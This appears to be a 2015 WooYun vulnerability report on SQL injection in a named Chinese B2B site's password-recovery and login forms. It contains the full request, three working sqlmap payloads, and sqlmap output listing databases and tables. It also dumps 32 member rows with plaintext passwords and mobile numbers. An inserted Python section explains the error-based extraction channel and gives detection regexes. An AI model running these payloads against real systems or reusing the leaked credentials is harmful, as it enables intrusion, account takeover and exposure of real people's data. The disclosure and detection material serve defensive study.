WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online reader ------------------ http://drop.zone.ci/
2015-10-29: Actively contacting the vendor and waiting for the vendor to claim the report; details are not disclosed publicly.
2015-12-13: The vendor has actively ignored the vulnerability; details are now disclosed to the public.

Multiple SQL injections in China Business Port (中国商业港) can leak 3.95 million member records (affects a large number of enterprises)

http://www.eb80.com.cn/retrieve.aspx
http://www.eb80.com.cn/login.aspx
Both the login username and the password are injectable.
POST /retrieve.aspx HTTP/1.1
Host: www.eb80.com.cn
Proxy-Connection: keep-alive
Content-Length: 258
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.eb80.com.cn
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: http://www.eb80.com.cn/retrieve.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: baidu=url=https://www.baidu.com/link?url=NruWSHx6qapsBW8OUE-sd385TXJT2ftf0ip_wap6ZbxFI46wwh3BTaysIRg92oMT&wd=&eqid=e3597bae0000a299000000045631d950; CNZZDATA2189235=cnzz_eid%3D402168800-1445938092-null%26ntime%3D1446103279
AlexaToolbar-ALX_NS_PH: AlexaToolbar/alxg-3.3

__VIEWSTATE=%2FwEPDwUKMTQxMjk1Mzk2OGRkCQOt689wrulJvSfJR%2Bagkr%2FW03QmpbLnupc2%2BgHxUmc%3D&__EVENTVALIDATION=%2FwEWAwLXw6yLDQKpkq%2B%2BBQKM54rGBs%2BmqWbjv05jIBDG%2BHeMrqu%2FhnDpkRz%2BNN2Twh8l5flh&loginid=1234%40qq.com*&Button1=%C8%A1%BB%D8%C3%DC%C2%EB

The loginid parameter is vulnerable to SQL injection (the `*` after the value in the request body above is sqlmap's custom injection marker).
---
Parameter: #1* ((custom) POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: __VIEWSTATE=/wEPDwUKMTQxMjk1Mzk2OGRkCQOt689wrulJvSfJR+agkr/W03QmpbLnupc2+gHxUmc=&__EVENTVALIDATION=/wEWAwLXw6yLDQKpkq++BQKM54rGBs+mqWbjv05jIBDG+HeMrqu/hnDpkRz+NN2Twh8l5flh&loginid=1234@qq.com' AND 4942=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(98)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (4942=4942) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(106)+CHAR(113))) AND 'DnHl'='DnHl&Button1=%C8%A1%BB%D8%C3%DC%C2%EB

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: __VIEWSTATE=/wEPDwUKMTQxMjk1Mzk2OGRkCQOt689wrulJvSfJR+agkr/W03QmpbLnupc2+gHxUmc=&__EVENTVALIDATION=/wEWAwLXw6yLDQKpkq++BQKM54rGBs+mqWbjv05jIBDG+HeMrqu/hnDpkRz+NN2Twh8l5flh&loginid=1234@qq.com';WAITFOR DELAY '0:0:5'--&Button1=%C8%A1%BB%D8%C3%DC%C2%EB

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (comment)
    Payload: __VIEWSTATE=/wEPDwUKMTQxMjk1Mzk2OGRkCQOt689wrulJvSfJR+agkr/W03QmpbLnupc2+gHxUmc=&__EVENTVALIDATION=/wEWAwLXw6yLDQKpkq++BQKM54rGBs+mqWbjv05jIBDG+HeMrqu/hnDpkRz+NN2Twh8l5flh&loginid=1234@qq.com' WAITFOR DELAY '0:0:5'--&Button1=%C8%A1%BB%D8%C3%DC%C2%EB
---
[16:56:57] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
[16:56:57] [INFO] fetching database names
[16:56:57] [INFO] the SQL query used returns 9 entries
[16:56:57] [INFO] resumed: EbBuy
[16:56:57] [INFO] resumed: master
[16:56:57] [INFO] resumed: model
[16:56:57] [INFO] resumed: msdb
[16:56:57] [INFO] resumed: new21tex
[16:56:57] [INFO] resumed: ReportServer
[16:56:57] [INFO] resumed: ReportServerTempDB
[16:56:57] [INFO] resumed: tempdb
[16:56:57] [INFO] resumed: zlceshi
available databases [9]:
[*] EbBuy
[*] master
[*] model
[*] msdb
[*] new21tex
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] zlceshi
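The following is an added example, not part of the WooYun report, showing what the three sqlmap payloads against the loginid parameter of retrieve.aspx actually do: how the error-based one smuggles data back inside a SQL Server conversion error, what the stacked-query payload turns the server's query into, and a minimal detection check for these payload families in POST bodies. The shape of the server-side query (render_query) is an assumption; the report does not show the ASP.NET source. The error message text is constructed in the style of SQL Server's "Conversion failed" error and is not taken from the report.

```python
import re
from urllib.parse import quote_plus, unquote_plus

# The benign loginid value from the report and the suffixes sqlmap appended to it.
LOGINID = "1234@qq.com"
ERROR_BASED = (
    "' AND 4942=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(98)+CHAR(107)+CHAR(113)"
    "+(SELECT (CASE WHEN (4942=4942) THEN CHAR(49) ELSE CHAR(48) END))"
    "+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(106)+CHAR(113))) AND 'DnHl'='DnHl"
)
STACKED = "';WAITFOR DELAY '0:0:5'--"
TIME_BASED = "' WAITFOR DELAY '0:0:5'--"


def render_query(loginid: str) -> str:
    """ASSUMED server-side query: plain string concatenation, which is what the
    observed payload behaviour implies. The real application code is not in the report."""
    return f"SELECT password, mobile, email FROM member WHERE loginid='{loginid}'"


def sqlmap_markers(payload: str) -> tuple[str, str]:
    """sqlmap builds two random 5-character marker strings from CHAR() calls and
    wraps the value it wants around them, so the value can be located inside the
    database's error text. Decode the first and last five CHAR() calls."""
    codes = [int(c) for c in re.findall(r"CHAR\((\d+)\)", payload)]
    prefix = "".join(map(chr, codes[:5]))
    suffix = "".join(map(chr, codes[-5:]))
    return prefix, suffix


def extract_from_error(error_text: str, prefix: str, suffix: str):
    """Pull the leaked value out of a conversion error message. CONVERT(INT, 'qxbkq1qzzjq')
    cannot succeed, so SQL Server echoes the string in the error and the prefix/suffix
    tell us where the payload's SELECT result starts and ends."""
    m = re.search(re.escape(prefix) + r"(.*?)" + re.escape(suffix), error_text)
    return m.group(1) if m else None


def leaked_value(payload: str, error_text: str):
    """Convenience wrapper: decode the markers from the payload, then read the error."""
    prefix, suffix = sqlmap_markers(payload)
    return extract_from_error(error_text, prefix, suffix)


# Detection: fingerprints shared by the three payload families in the report.
# None of these should ever appear in a login or password-recovery form field.
SIGNATURES = [
    ("error-based CONVERT/CHAR", re.compile(r"CONVERT\s*\(\s*INT\s*,.*CHAR\s*\(\d+\)", re.I | re.S)),
    ("stacked WAITFOR DELAY", re.compile(r";\s*WAITFOR\s+DELAY", re.I)),
    ("time-based WAITFOR DELAY", re.compile(r"'\s*WAITFOR\s+DELAY", re.I)),
]


def flag_form_body(body: str) -> list[str]:
    """Return the names of the signatures matched in a URL-encoded POST body."""
    decoded = unquote_plus(body)
    return [name for name, rx in SIGNATURES if rx.search(decoded)]


def form_body(loginid: str) -> str:
    """Build a retrieve.aspx-style body (VIEWSTATE fields shortened to placeholders)."""
    return "__VIEWSTATE=x&__EVENTVALIDATION=y&loginid=" + quote_plus(loginid) + "&Button1=z"


if __name__ == "__main__":
    # Constructed error text in the style of SQL Server error 245; CHAR(49) is '1',
    # so seeing '1' between the markers proves 4942=4942 was evaluated by the database.
    err = "Conversion failed when converting the nvarchar value 'qxbkq1qzzjq' to data type int."
    print("markers:", sqlmap_markers(ERROR_BASED))
    print("leaked:", leaked_value(ERROR_BASED, err))
    print("stacked query seen by SQL Server:", render_query(LOGINID + STACKED))
    for suffix in ("", ERROR_BASED, STACKED, TIME_BASED):
        print(repr(suffix[:24]), "->", flag_form_body(form_body(LOGINID + suffix)))
```

The same marker-extraction channel is what sqlmap used for the database listing that follows: replace the CASE expression with any scalar subquery (DB_NAME(), a row of dbo.member) and the value comes back between the markers in the error text. On the defensive side, the detection regexes are deliberately narrow; they catch the payloads shown here but are no substitute for parameterised queries, which remove the concatenation render_query illustrates.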
Database: new21tex
[46 tables]
+--------------+
| BuyOne       |
| Cert         |
| GoldenChange |
| KeyList      |
| MoneyList    |
| News         |
| Pro_cate     |
| Report       |
| SeeBuy       |
| UpdateMoney  |
| admin        |
| appraisal    |
| area         |
| bbs          |
| bbscate      |
| bbsreport    |
| buy          |
| buylink      |
| buyold       |
| cate         |
| cateinfo     |
| client       |
| delmember    |
| dtproperties |
| favorite     |
| friend       |
| friendlyLink |
| hangzhou     |
| info         |
| info_cate    |
| info_manage  |
| info_report  |
| job          |
| keywords     |
| link         |
| member       |
| mystore      |
| newcate      |
| pm           |
| poll         |
| question     |
| remark       |
| sale         |
| toupiao      |
| zymjisuande  |
| zymjisuande2 |
+--------------+

Database: new21tex
+------------------+---------+
| Table            | Entries |
+------------------+---------+
| dbo.member       | 3953424 |
| dbo.buylink      | 1130709 |
| dbo.buyold       | 774857  |
| dbo.buy          | 375335  |
| dbo.BuyOne       | 212201  |
| dbo.Pro_cate     | 138593  |
| dbo.cateinfo     | 60941   |
| dbo.sale         | 40717   |
+------------------+---------+

A few rows of data as proof:
Database: new21tex
Table: member
[32 entries]
+----------------+-----------------+-------------+-------------------+
| loginid        | password        | mobile      | email             |
+----------------+-----------------+-------------+-------------------+
| hdsm           | 232518          | 15888578621 | [email protected] |
| chunhu888      | 82750082        | 13735051668 | [email protected] |
| my0397         | 3935555         | 13033788602 | [email protected] |
| kamada0421     | kamada123456    | 13929413635 | [email protected] |
| wei10021230    | 123123          | 18639195144 | [email protected] |
| futianjian     | a5682563        | 18473056208 | [email protected] |
| sdxx           | sdxx159         | 13388866666 | [email protected] |
| nss607         | nss607nss607    | 13602885625 | [email protected] |
| ykzdhsb        | 553231          | 13994227979 | [email protected] |
| xinglong       | 518520          | 18028118004 | [email protected] |
| fzcs           | wyy197828       | 13806479595 | [email protected] |
| akr123         | akr1234         | 15098944980 | [email protected] |
| dgy2           | 03557180443     | 15383440960 | [email protected] |
| ylgs           | lwogw           | 13533861288 | [email protected] |
| wangruifa1989  | 1989520mix      | 13510005605 | [email protected] |
| jhfmzziwo      | jianhuavalve    | 18605366676 | [email protected] |
| zzcinline      | zzcinline       | 15300365668 | [email protected] |
| rst761224      | rst761224123    | 15011876851 | [email protected] |
| wxtmm123       | tianmimi123     | 15261560098 | [email protected] |
| bjdpwg         | 19656634jdww    | 13391838980 | [email protected] |
| beiya321       | sybywdblj       | 13940406166 | [email protected] |
| xinsenkuangye  | 15027773012     | 15027773012 | [email protected] |
| sindy0418      | tangyanfei1984  | 13815177971 | [email protected] |
| zzltyl         | zhengzhouletong | 13393719244 | [email protected] |
| shu8615100     | 4502558         | 15337169306 | [email protected] |
| wmf13608847120 | wmf3310057510   | 13759511960 | [email protected] |
| zhengmei123    | HAIYANG520      | 18855183912 | [email protected] |
| a546620        | a546620         | 13929498483 | [email protected] |
| huamei226      | 890226105       | 15690388969 | [email protected] |
| hl87935548     | a168168         | 13829175103 | [email protected] |
| ji1021055299   | jiyuanjin       | 13952089461 | [email protected] |
| cqdudu         | abcabc000       | 18523369997 | [email protected] |
+----------------+-----------------+-------------+-------------------+

Passwords are stored and returned in plaintext; the mobile and email columns are what turns a 3.95 million-row member table into a mass exposure of the enterprises registered on the site.

Could not reach the vendor, or the vendor actively refused.
Vulnerability Rank: 15 (WooYun rating)